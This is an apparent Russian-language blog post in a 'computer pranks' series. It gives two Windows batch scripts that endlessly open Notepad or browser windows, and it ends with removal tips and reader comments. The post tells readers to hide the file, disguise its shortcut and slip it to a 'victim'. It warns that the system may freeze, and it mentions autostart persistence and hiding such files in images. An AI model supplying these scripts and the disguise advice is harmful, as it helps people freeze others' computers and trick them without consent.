Вирус спам с открытием множественных окон Блокнота

Вирус спам с открытием множественных окон.

Вирус спам с открытием множественных окон

спамспам

Всем привет и это очередной компьютерный прикол от Компьютер76. Сегодня мы продолжаем издеваться над своими друзьями и коллегами. На своей домашней системе не пробовать! Для проверки заведите виртуальную машину.

Вариант 1. Сейчас я вам покажу, как создать небольшой вирус спам, который выражается в бесконечно открывающихся окнах, например, всеми любимого текстового редактора Блокнота. Для этого нам сначала придётся создать новый документ этого редактора и ввести следующий код:

@ECHO off

:top

START %SystemRoot%\system32\notepad.exe

GOTO top

Сохраним под любым названием, спрячем подальше от глаз жертвы и сделаем его скрытым. Создадим ярлык для этого файла и подсунем под любым предлогом жертве. Подробности того, как скрыть пакости, читайте в статье Как спрятать вирус или Как спрятать файл в рисунок.

Будьте аккуратны! Последствия могут быть печальны. Окна Блокнота будут открываться с потрясающей скоростью и система, в конце концов, может зависнуть. Перед тем, как попробовать очередной компьютерный трюк закройте все окна и сохраните важную информацию!

Вариант 2. Откройте Блокнот и введите туда следующий код:

Похожее
@echo off

:A

start www.yandex.ru

ping localhost -n 5 >nul

goto :A

В принципе, можете написать имя любого сайта. Не обязательно это должно быть названием популярного поисковика. В своё время я занёс в этот файл адрес сайта с весёленькими картинками красивых, но не очень одетых девочек. Вот сраму-то было…

Назовите файл как-нибудь.bat и подсуньте жертве с изменённым ярлыком. Если жертва запустит его на компьютере, запустится браузер с бесчисленным количеством окон по указанному адресу. Самый настоящий вирус спам !

Как удалить вирус спам ?

Если вы знаете причину возникновения вируса, то и удалить её возможно без труда. Однако, если у вас хватило ума попробовать его на своей системе, придав элементы скрытности и автозапуска, вирус, вероятно, захватил ресурсы вашей Windows. Стопроцентный вариант избавиться от него – загрузка с внешнего носителя (например, Windows PE) и удаление файла-виновника из автозагрузки или вообще из системы.

Берегите зубы и…

Успехов

Ещё больше приколов в разделе Компьютерные приколы

Посмотреть комментарии

    • Если вы поместили вирус в автозапуск - придётся редактировать содержимое папки автозагрузки с внешнего носителя (загрузочных диска или флешки). Попробуйте также остановить процесс из Диспетчера задач.

    • как убрать вирус? если вы не поставили автозапуск то просто закройте окно консоли и закройте окна которые открылись а вот с автозапуском я не знаю